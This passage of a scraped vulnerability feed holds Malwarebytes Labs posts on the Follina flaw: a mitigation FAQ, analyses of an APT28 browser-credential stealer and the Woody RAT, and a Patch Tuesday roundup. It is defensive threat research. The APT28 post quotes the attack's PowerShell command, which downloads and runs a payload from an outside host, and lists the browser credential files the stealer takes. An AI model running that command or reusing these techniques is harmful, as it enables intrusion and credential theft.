documents.\n\n_**Q: What exactly is Follina?**_\n\nA: Follina is the nickname given to a new vulnerability discovered as a zero-day and identified as CVE-2022-30190. In technical terms it is a Remote Code Execution Vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT).\n\n_**Q: But what does it mean, and is this a serious vulnerability?**_\n\nA: An attacker can send you a malicious Office document that will compromise your machine with malware when you open it. It is serious since it is already actively being exploited in the wild and doesn't require users to enable macros.\n\n**_Q: What is Microsoft doing about it?_**\n\nA: Microsoft has offered [mitigation steps](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) that disable the MSDT URL Protocol. However, users should proceed with caution because of possible conflicts and crashes with existing applications.\n\n_**Q: Does Malwarebytes protect against Follina?**_\n\nA: Yes, it does. Please see additional steps below based on your product to ensure you are protected.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/Follina_block.png> \"\" )\n\n## How to add protection with Malwarebytes\n\nWe are working on releasing a new version of Anti-Exploit that won't require adding new shields and will provide more holistic protection. 
For immediate mitigation, please follow the instructions below.\n\n### Malwarebytes Premium (Consumer)\n\nFollow the instructions below to add `sdiagnhost.exe` as a new protected application.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/MB4.gif> \"\" )\n\n### Malwarebytes Nebula (Enterprise)\n\nFollow the instructions below to add `sdiagnhost.exe` as a new protected application.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/Nebula.gif> \"\" )\n\nThe post [FAQ: Mitigating Microsoft Office's 'Follina' zero-day](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/faq-mitigating-microsoft-offices-follina-zero-day/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T16:36:44", "type": "malwarebytes", "title": "FAQ: Mitigating Microsoft Office\u2019s \u2018Follina\u2019 zero-day", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-01T16:36:44", "id": "MALWAREBYTES:6AC81D4001C847401760BE111E21585B", "href": 
"https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/faq-mitigating-microsoft-offices-follina-zero-day/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-23T14:35:47", "description": "_This blog post was authored by Hossein Jazi and Roberto Santos_.\n\nIn a recent campaign, APT28, an advanced persistent threat actor linked with Russian intelligence, set its sights on Ukraine, targeting users with malware that steals credentials stored in browsers.\n\nAPT28 (also known as Sofacy and Fancy Bear) is a notorious Russian threat actor that has been active since at least 2004 with its main activity being collecting intelligence for the Russian government. The group is known to have targeted US politicians, and [US organizations](<https://blog.malwarebytes.com/reports/2021/07/beware-password-spraying-fancy-bears/>), including US nuclear facilities.\n\nOn June 20, 2022, Malwarebytes Threat Intelligence [identified](<https://twitter.com/h2jazi/status/1538957205210337280>) a document that had been weaponized with the [Follina](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/microsoft-office-zero-day-follina-its-not-a-bug-its-a-feature-its-a-bug/>) (CVE-2022-30190) exploit to download and execute a new .Net stealer first reported by [Google](<https://blog.google/threat-analysis-group/update-on-cyber-activity-in-eastern-europe/>). The discovery was also made [independently by CERT-UA](<https://cert.gov.ua/article/341128>).\n\nFollina is a recently-discovered zero-day exploit that uses the `ms-msdt` protocol to load malicious code from Word documents when they are opened. This is the first time we've observed APT28 using Follina in its operations. \n\n## The malicious document\n\nThe maldoc's filename, `Nuclear Terrorism A Very Real Threat.rtf`, attempts to get victims to open it by preying on their fears that the invasion of Ukraine will escalate into a nuclear conflict. 
\n\nThe content of the document is an article from the [Atlantic Council](<https://www.atlanticcouncil.org/blogs/new-atlanticist/will-putin-use-nuclear-weapons-in-ukraine-our-experts-answer-three-burning-questions/>) called "_Will Putin use nuclear weapons in Ukraine? Our experts answer three burning questions_" published on May 10 this year.\n\nThe lure asks "Will Putin use nuclear weapons in Ukraine?"\n\nThe maldoc is a docx file (pretending to be an RTF file) compiled on June 10, which suggests that the attack was used around the same time. It uses a remote template embedded in the `Document.xml.rels` file to retrieve a remote HTML file from the URL [http://kitten-268.frge.io/article.html](<https://www.virustotal.com/gui/url/9863b9b4ae9c555cd4dc30803000ea202f642a37321da2222fec9d51bce443b1>).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/malicious-html-document.png> \"\" )The malicious HTML document\n\nThe HTML file uses a JavaScript call to `window.location.href` to load and execute an encoded PowerShell script using the `ms-msdt` MSProtocol URI scheme. The decoded script uses `cmd` to run PowerShell code that downloads and executes the final payload:\n \n \n \"C:\\WINDOWS\\system32\\cmd.exe\" /k powershell -NonInteractive -WindowStyle Hidden -NoProfile -command \"& {iwr http://kompartpomiar.pl/grafika/SQLite.Interop.dll -OutFile \"C:\\Users\\$ENV:UserName\\SQLite.Interop.dll\";iwr http://kompartpomiar.pl/grafika/docx.exe -OutFile \"C:\\Users\\$ENV:UserName\\docx.exe\";Start-Process \"C:\\Users\\$ENV:UserName\\docx.exe\"}\"\n\n## Payload Analysis\n\nThe final payload is a variant of a stealer APT28 has [used against targets in Ukraine](<https://blog.google/threat-analysis-group/update-on-cyber-activity-in-eastern-europe/>) before. In the oldest variant, the stealer used a fake error message to hide what it was doing (a secondary thread displayed this error message while the main program continued executing). 
The new variant does not show the popup. \n\nIn older versions of the stealer, a fake error message distracted users \n\nThe variant used in this attack is almost identical to the one reported by Google, with just a few minor refactors and some additional sleep commands.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/comparing-version-one-and-version-two-of-the-malicious-stealer.png> \"\" )A side-by-side comparison of two versions of the APT28 stealer\n\nAs with the previous variant, the stealer's main purpose is to steal data from several popular browsers.\n\n### Google Chrome and Microsoft Edge\n\nThe malware steals any website credentials (username, password, and URL) users have saved in the browser by reading the contents of `%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Login Data`.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/debugging-session-1.png> \"\" )Debugging session showing how attackers are capable of stealing credentials\n\nIn a very similar way, the new variant also grabs all the saved cookies stored in Google Chrome by accessing `%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Network\\Cookies`. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/cookie-stealing.png> \"\" )Cookie stealing code (Google Chrome)\n\nStolen cookies can sometimes be used to break into websites even if the username and password aren't saved to the browser.\n\nThe code to steal cookies and passwords from the Chromium-based Edge browser is almost identical to the code used for Chrome.\n\n### Firefox\n\nThis malware can also steal data from Firefox. 
It does this by iterating through every profile looking for the `cookies.sqlite` file that stores the cookies for each user.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/cookie-stealing-firefox.png> \"\" )Sysmon capturing access to cookies.sqlite file\n\nIn the case of passwords, the attackers attempt to steal `logins.json`, `key3.db`, `key4.db`, `cert8.db`, `cert9.db`, `signons.sqlite`.\n\nAttackers will also grab passwords from Firefox\n\nThese files are necessary for recovering elements like saved passwords and certificates. Older Firefox versions are also supported (`signons.sqlite`, `key3.db` and `cert8.db` are no longer used by new Firefox versions). Note that if the user has set a master password, the attackers will likely attempt to crack this password offline, later, to recover these credentials.\n\n## Exfiltrating data\n\nThe malware uses the IMAP email protocol to exfiltrate data to its command and control (C2) server.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/06/imap-login-event.png> \"\" )The IMAP login event\n\nThe old variant of this stealer connected to mail[.]sartoc.com (144.208.77.68) to exfiltrate data. The new variant uses the same method but a different domain, www.specialityllc[.]com. Interestingly, both are located in Dubai.\n\nIt's likely the owners of the C2 websites have nothing to do with APT28, and the group simply took advantage of abandoned or vulnerable sites.\n\nAlthough ransacking browsers might look like petty theft, passwords are the key to accessing sensitive information and intelligence. The target, and the involvement of APT28 (a division of Russian military intelligence), suggests that the campaign is part of the conflict in Ukraine, or at the very least linked to the foreign policy and military objectives of the Russian state. 
Ukraine continues to be a battleground for cyberattacks and espionage, as well as devastating kinetic warfare and humanitarian abuses.\n\nFor more coverage of threat actors active in the Ukraine conflict, read our recent article about the efforts of an unknown APT group that has [targeted Russia repeatedly since Ukraine invasion](<https://blog.malwarebytes.com/threat-intelligence/2022/05/unknown-apt-group-has-targeted-russia-repeatedly-since-ukraine-invasion/>).\n\n## Protection\n\nMalwarebytes customers were proactively protected against this campaign thanks to our anti-exploit protection.\n\n## IOCs\n\n**Maldoc:** \nNuclear Terrorism A Very Real Threat.rtf \ndaaa271cee97853bf4e235b55cb34c1f03ea6f8d3c958f86728d41f418b0bf01 \n \n**Remote template (Follina):** \nhttp://kitten-268.frge[.]io/article.html \n \n**Stealer:** \nhttp://kompartpomiar[.]pl/grafika/docx.exe \n2318ae5d7c23bf186b88abecf892e23ce199381b22c8eb216ad1616ee8877933 \n \n**C2:** \nwww.specialityllc[.]com \n\nThe post [Russia's APT28 uses fear of nuclear war to spread Follina docs in Ukraine](<https://blog.malwarebytes.com/threat-intelligence/2022/06/russias-apt28-uses-fear-of-nuclear-war-to-spread-follina-docs-in-ukraine/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-21T15:25:09", "type": "malwarebytes", "title": "Russia\u2019s APT28 uses fear of nuclear war to spread Follina docs in Ukraine", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-21T15:25:09", "id": "MALWAREBYTES:69B09CC9DBBA58546698D97B0C4BAAF0", "href": "https://blog.malwarebytes.com/threat-intelligence/2022/06/russias-apt28-uses-fear-of-nuclear-war-to-spread-follina-docs-in-ukraine/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-04T15:17:43", "description": "_This blog post was authored by Ankur Saini and Hossein Jazi_\n\nThe Malwarebytes Threat Intelligence team has identified a new Remote Access Trojan we are calling Woody Rat that has been in the wild for at least one year.\n\nThis advanced custom Rat is mainly the work of a threat actor that targets Russian entities by using lures in archive file format and more recently Office documents leveraging the Follina vulnerability.\n\nBased on a fake domain registered by the threat actors, we know that they tried to target a Russian aerospace and defense entity known as [OAK](<https://en.wikipedia.org/wiki/United_Aircraft_Corporation>).\n\nIn this blog post, we will analyze Woody Rat's distribution methods, capabilities as well as communication protocol.\n\n## Distribution methods \n\nBased on our knowledge, Woody Rat has been distributed using two different formats: archive files and Office documents using the Follina vulnerability.\n\nThe earliest versions of this Rat was typically archived into a zip file pretending to be a document specific to a Russian group. 
When the Follina vulnerability became known to the world, the threat actor switched to it to distribute the payload, as identified by [@MalwareHunterTeam](<https://twitter.com/malwrhunterteam/status/1534184385313923072>).\n\nThe following diagram shows the overall attack flow used by the threat actor to drop Woody Rat:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure1.png> \"\" )Woody Rat distribution methods\n\n**Archive files**\n\nIn this method, Woody Rat is packaged into an archive file and sent to victims. We believe that these archive files have been distributed using spear phishing emails. Here are some examples of these archive files:\n\n * _anketa_brozhik.doc.zip_: It contains Woody Rat with the same name: _Anketa_Brozhik.doc.exe_.\n * _zayavka.zip_: It contains Woody Rat pretending to be an application (application for participation in the _selection.doc.exe_).\n\n**Follina vulnerability**\n\nThe threat actor is using a Microsoft Office document (_\u041f\u0430\u043c\u044f\u0442\u043a\u0430.docx_) that has been weaponized with the Follina (CVE-2022-30190) vulnerability to drop Woody Rat. The lure, written in Russian, is called "_Information security memo_" and provides security practices for passwords, confidential information, etc. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure2.png> \"\" )Document lure\n\n## Woody Rat Analysis\n\nThe threat actor has left some debugging information including a PDB path from which we derived and picked a name for this new Rat:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure3.png> \"\" )Debug Information\n\nA lot of CRT functions seem to be statically linked, which leads to IDA generating a lot of noise and hindering analysis. 
Before initialization, the malware effectively suppresses all error reporting by calling SetErrorMode with 0x8007 as parameter.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure4.png> \"\" )main function\n\nAs we will see later, the malware uses multiple threads, and so it allocates a global object and assigns a mutex to it to make sure no two clashing operations can take place at the same time. This object enforces that only one thread is reaching out to the C2 at a given time and that there are no pending requests before making another request. \n\n### Deriving the Cookie\n\nThe malware communicates with its C2 using HTTP requests. To uniquely identify each infected machine, the malware derives a cookie from machine-specific values. The values are taken from the adapter information, computer name and volume information, and 8 random bytes are appended to this value to avoid possible cookie collisions.\n\nA combination of the _GetAdaptersInfo_, _GetComputerNameA_ and _GetVolumeInformationW_ functions is used to retrieve the required data to generate the cookie. This cookie is sent with every HTTP request that is made to the C2.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure5.png> \"\" )get_cookie_data function\n\n### Data encryption with HTTP requests\n\nTo evade network-based monitoring the malware uses a combination of RSA-4096 and AES-CBC to encrypt the data sent to the C2. The public key used for RSA-4096 is embedded inside the binary; the malware formulates the RSA public key blob at runtime using the embedded data and imports it using the _BCryptImportKeyPair_ function.\n\nThe malware derives the key for AES-CBC at runtime by generating 32 random bytes; these 32 bytes are then encrypted with RSA-4096 and sent to the C2. 
Both the malware and the C2 then use these bytes to generate the AES-CBC key using _BCryptGenerateSymmetricKey_, and that key is used in subsequent HTTP requests to encrypt and decrypt the data. For encryption and decryption the malware uses _BCryptEncrypt_ and _BCryptDecrypt_ respectively.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure6.png> \"\" )RSA Encryption routine\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure7.png> \"\" )AES Encryption Routine\n\n### C2 HTTP endpoint request\n\n**knock** - This is the first HTTP request that the malware makes to the C2. The machine-specific cookie is sent as part of the headers here. This is a POST request whose body contains the 32 random bytes used to derive the AES-CBC key, RSA-4096 encrypted.\n\nThe data received in response to this request is decrypted; it contains the URL path (/submit) to which the additional machine information, generated by the malware after this operation, is submitted.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure8.png> \"\" )knock request headers\n\n**submit** - This endpoint request is used to submit information about the infected machine. The data sent to the C2 is AES-CBC encrypted. 
[Data](<https://gist.github.com/kernelm0de/fd018d58ebe78f603a13b2eba7f01917>) sent via the submit API includes:\n\n * OS\n * Architecture\n * Antivirus installed\n * Computer Name\n * OS Build Version\n * .NET information\n * PowerShell information\n * Python information (Install path, version etc.)\n * Storage drives - includes Drive path, Internal name etc.\n * Environment Variables\n * Network Interfaces\n * Administrator privileges\n * List of running processes\n * Proxy information\n * Username\n * List of all the User accounts\n\nThe malware currently detects 6 AVs through Registry Keys, these being Avast Software, Doctor Web, Kaspersky, AVG, ESET and Sophos.\n\n**ping** - The malware makes a ping GET HTTP request to the C2 at regular intervals. If the C2 responds with "_CRY" then the malware proceeds to send the knock request again, but if the C2 responds with "_ACK" the response contains additional information about which command should be executed by the malware.\n\nThe malware supports a wide variety of commands, which are classified into _SET and _REQ requests as seen while analyzing the malware. We will dive into all these commands below.\n\n### C2 Commands\n\nThe malware uses a specific thread to communicate with the C2 and a different one to execute the commands received from the C2. To synchronize between both threads, the malware leverages events and a mutex. To dispatch a command it modifies the state of the event linked to that object. 
We should note all the communications involved in these commands are AES encrypted.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure9.png> \"\" )Command execution routine\n\n**_SET Commands**\n\n * **PING** - This command is used to set the sleep interval between every ping request to the C2.\n * **PURG** - Unknown command\n * **EXIT** - Exit the command execution thread.\n\n**_REQ Commands**\n\n * **EXEC** (Execute) - Executes the command received from the C2 by creating a cmd.exe process; the malware creates two named pipes and redirects the input and output to these pipes. The output of the command is read using _ReadFile_ from the named pipe and then "_DAT" is appended to this data before it is AES encrypted and sent to the C2.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure10.png> \"\" )EXEC command\n\n * **UPLD** (Upload) - The Upload command is used to remotely upload a file to the infected machine. The malware makes a GET request to the C2 and receives data to be written as a file. \n * **INFO** (Submit Information) - The INFO command is similar to the "submit" request above; this command sends the same information to the C2 as the "submit" request.\n\nINFO command\n\n * **UPEX** (Upload and Execute) - This is a combination of the UPLD and EXEC commands. The command first writes a file received from the C2 and then executes that file.\n * **DNLD** (Download) - The DNLD command allows the C2 to retrieve any file from the infected machine. The malware encrypts the requested file and sends the data via a POST request to the C2.\n * **PROC** (Execute Process) - The PROC command is similar to the EXEC command with slight differences: here the process is executed directly instead of through cmd.exe as in the EXEC command. The command uses named pipes in the same fashion as the EXEC command.\n * **UPPR** (Upload and Execute Process) - This is a combination of the UPLD and PROC commands. 
The command receives the remote file using the upload command, then executes the file using the PROC command.\n * **SDEL** (Delete File) - This is used to delete any file on the infected system. It also seems to overwrite the first few bytes of the file to be deleted with random data.\n * **_DIR** (List directory) - This can list all the files and their attributes in a directory supplied as argument. If no directory is supplied, then it proceeds to list the current directory. File attributes retrieved by this command are:\n * Filename\n * Type (Directory, Unknown, File)\n * Owner\n * Creation time\n * Last access time\n * Last write time\n * Size\n * Permissions\n * **STCK** (Command Stack) - This allows the attacker to execute multiple commands with one request. The malware can receive a STCK command which can have multiple child commands, which are executed in the same order they are received by the malware.\n * **SCRN** (Screenshot) - This command leverages Windows GDI+ to take a screenshot of the desktop. The image is then encrypted using AES-CBC and sent to the C2.\n * **INJC** (Process Injection) - The malware seems to generate a new AES key for this command. The code to be injected is received from the C2 and decrypted. To inject the code into the target process it writes it to the remote memory using WriteProcessMemory and then creates a remote thread using CreateRemoteThread.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure12.png> \"\" )INJC routine\n\n * **PSLS** (Process List) - Calls _NtQuerySystemInformation_ with _SystemProcessInformation_ to retrieve an array containing all the running processes. Information sent about each process to the C2: \n * PID\n * ParentPID\n * Image Name\n * Owner\n * **DMON** (Creates Process) - The command seems similar to PROC with the only difference being that the output of the process execution is not sent back to the C2. 
It receives the process name from the C2 and executes it using CreateProcess.\n * **UPDM** (Upload and Create Process) - Allows the C2 to upload a file and then execute it using the DMON command.\n\n**SharpExecutor and PowerSession Commands**\n\nInterestingly, the malware has 2 .NET DLLs embedded inside. These DLLs are named _WoodySharpExecutor_ and _WoodyPowerSession_ respectively. _WoodySharpExecutor_ provides the malware the ability to run .NET code received from the C2. _WoodyPowerSession_ on the other hand allows the malware to execute PowerShell commands and scripts received from the C2.\n\n_WoodyPowerSession_ makes use of pipelines to execute these PS commands. The .NET DLLs are loaded by the malware and commands are executed via the methods present in these DLLs: \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure13.png> \"\" )SharpExecutor and PowerSession methods\n\nWe will look at the commands utilising these DLLs below:\n\n * **DN_B** (DotNet Binary) - This command makes use of the RunBinaryStdout method to execute Assembly code with arguments received from the C2. The code is received as an array of Base64 strings separated by the 0x20 (space) character. \n * **DN_D** (DotNet DLL) - This method gives the attacker much more control over the execution. An attacker can choose whether or not to send the console output back to the C2. The method receives an array of Base64 strings consisting of code, class name, method name and arguments. 
The DLL loads the code and finds and executes the method based on other arguments received from the C2.\n * **PSSC** (PowerSession Shell Command) - Allows the malware to receive a Base64 encoded PowerShell command and execute it.\n * **PSSS** (PowerSession Shell Script) - This command allows the malware to load and execute a Base64 encoded PowerShell script received from the C2.\n * **PSSM** (PowerSession Shell Module) - This command receives an array of Base64 encoded strings, one of which contains the module contents and the other one contains the module name. These strings are decoded and this module is imported to the command pipeline and then invoked.\n\n### Malware Cleanup\n\nAfter creating the command threads, the malware deletes itself from disk. It uses the more commonly known _ProcessHollowing_ technique to do so. It creates a suspended notepad process and then writes shellcode to delete a file into the suspended process using _NtWriteVirtualMemory_. The entry point of the thread is set by using the _NtSetContextThread_ method and then the thread is resumed. This leads to the deletion of the malware from disk.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure14.png> \"\" )Malware deletes itself\n\n## Unknown threat actor\n\nThis very capable Rat falls into the category of unknown threat actors we track. Historically, Chinese APTs such as Tonto team as well as North Korea with Konni have targeted Russia. However, based on what we were able to collect, there weren't any solid indicators to attribute this campaign to a specific threat actor.\n\nMalwarebytes blocks the Follina exploit that is being leveraged in the latest Woody Rat campaign. 
We also already detected the binary payloads via our heuristic malware engines.\n\n## IOCs\n\n**Follina Doc:** \n\u041f\u0430\u043c\u044f\u0442\u043a\u0430.docx \nffa22c40ac69750b229654c54919a480b33bc41f68c128f5e3b5967d442728fb \n**Follina html file:** \ngarmandesar.duckdns[.]org:444/uoqiuwef.html \n**Woody Rat url:** \nfcloud.nciinform[.]ru/main.css \n\nThe post [Woody RAT: A new feature-rich malware spotted in the wild](<https://blog.malwarebytes.com/threat-intelligence/2022/08/woody-rat-a-new-feature-rich-malware-spotted-in-the-wild/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-03T21:25:52", "type": "malwarebytes", "title": "Woody RAT: A new feature-rich malware spotted in the wild", "bulletinFamily": "blog", "cvss2": 
{"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-08-03T21:25:52", "id": "MALWAREBYTES:9E683A8CBB0F4ADB76A7183C47833E13", "href": "https://blog.malwarebytes.com/threat-intelligence/2022/08/woody-rat-a-new-feature-rich-malware-spotted-in-the-wild/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-15T14:57:21", "description": "The June 2022 Patch Tuesday may go down in history as the day that [Follina](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/microsoft-office-zero-day-follina-its-not-a-bug-its-a-feature-its-a-bug/>) got patched, but there was a host of other important updates. And not just from Microsoft. Many other software vendors follow the pattern of monthly updates set by the people in Redmond.\n\n## Microsoft\n\nMicrosoft released updates to deal with 60 security vulnerabilities. Undoubtedly the most prominent is the one that goes by the name of [Follina](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/microsoft-office-zero-day-follina-its-not-a-bug-its-a-feature-its-a-bug/>). The Edge browser received five of the patched vulnerabilities.\n\n### Follina, or CVE-2022-30190\n\nA quick recap about Follina. On Monday May 30, 2022, Microsoft issued [CVE-2022-30190](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30190>) regarding a vulnerability in the Microsoft Support Diagnostic Tool (MSDT) in Windows. 
An in-the-wild exploit used a feature in Word to retrieve an HTML file from a remote server, and that HTML file in turn used MSDT to load code and execute PowerShell commands.\n\n### CVE-2022-30136\n\nAnother critical vulnerability is [CVE-2022-30136](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30136>), a bug in NFS 4.1 which could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger a Remote Code Execution (RCE). This vulnerability concerns a number of Windows Server products and received a [CVSS](<https://blog.malwarebytes.com/malwarebytes-news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities/>) score of 9.8 out of 10. Last month, Microsoft fixed a similar vulnerability ([CVE-2022-26937](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26937>)) affecting NFS v2.0 and v3.0.\n\n### CVE-2022-30139\n\nSimilar is [CVE-2022-30139](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30139>), a Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution (RCE) vulnerability. This vulnerability is only exploitable if the MaxReceiveBuffer LDAP policy is set to a value higher than the default value. LDAP is a software protocol for enabling anyone to locate data about organizations, individuals and other resources such as files and devices in a network. LDAP is a "lightweight" (smaller amount of code) version of Directory Access Protocol (DAP). In total, seven vulnerabilities in LDAP were found and fixed.\n\n### CVE-2022-30163\n\nNoteworthy as well is [CVE-2022-30163](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30163>), a Windows Hyper-V Remote Code Execution vulnerability that allows an attacker to run a specially crafted application on a Hyper-V guest that could cause the Hyper-V host operating system to execute arbitrary code. 
Microsoft Hyper-V is a virtualization platform, which enables administrators to virtualize multiple operating systems to run off the same physical server simultaneously.\n\n## More Microsoft news\n\nMicrosoft has also started to phase out Internet Explorer, but more about that in a [separate post](<https://blog.malwarebytes.com/reports/2022/06/its-official-today-you-can-say-goodbye-to-internet-explorer-or-can-you/>).\n\nAnd then there was a storm of criticism about the way Microsoft handled the [SynLapse vulnerability](<https://orca.security/resources/blog/synlapse-critical-azure-synapse-analytics-service-vulnerability/>) in Azure Data Factory and Azure Synapse Pipelines. SynLapse is the name for a critical bug in Azure\u2019s Synapse service that allowed attackers to obtain credentials to other workspaces, execute code, or leak customer credentials to data sources outside of Azure. Rather than dealing with the vulnerability in a way that closed the gap once and for all, Microsoft chose what researchers called a halfhearted fix that was easily bypassed in a subsequent attempt. 
Orca researchers said they were able to bypass Microsoft\u2019s fix for the issue twice before the company put a working fix in place.\n\n## Other vendors\n\nAdobe has released security updates to address vulnerabilities in [multiple products](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/14/adobe-releases-security-updates-multiple-products>).\n\n[Atlassian](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) released a patch for the [actively exploited](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/multiple-adversaries-exploiting-confluence-vulnerability-warns-microsoft/>) Confluence RCE vulnerability.\n\n[Citrix](<https://support.citrix.com/article/CTX460016/citrix-application-delivery-management-security-bulletin-for-cve202227511-and-cve202227512>) fixed two vulnerabilities in Citrix ADM server and Citrix ADM agent.\n\n[Drupal](<https://www.drupal.org/sa-core-2022-011>) fixed two \u201cModerately critical\u201d vulnerabilities.\n\n[GitLab](<https://about.gitlab.com/releases/2022/06/01/critical-security-release-gitlab-15-0-1-released/>) released versions 15.0.1, 14.10.4, and 14.9.5 for GitLab Community Edition (CE) and Enterprise Edition (EE).\n\nGoogle put out updates for [Android](<https://source.android.com/security/bulletin/2022-06-01>) and [Chrome](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/update-chrome-now-four-high-risk-vulnerabilities-found/>).\n\n[SAP](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>) published security notes about some high priority vulnerabilities.\n\nStay safe, everyone!\n\nThe post [Update now! 
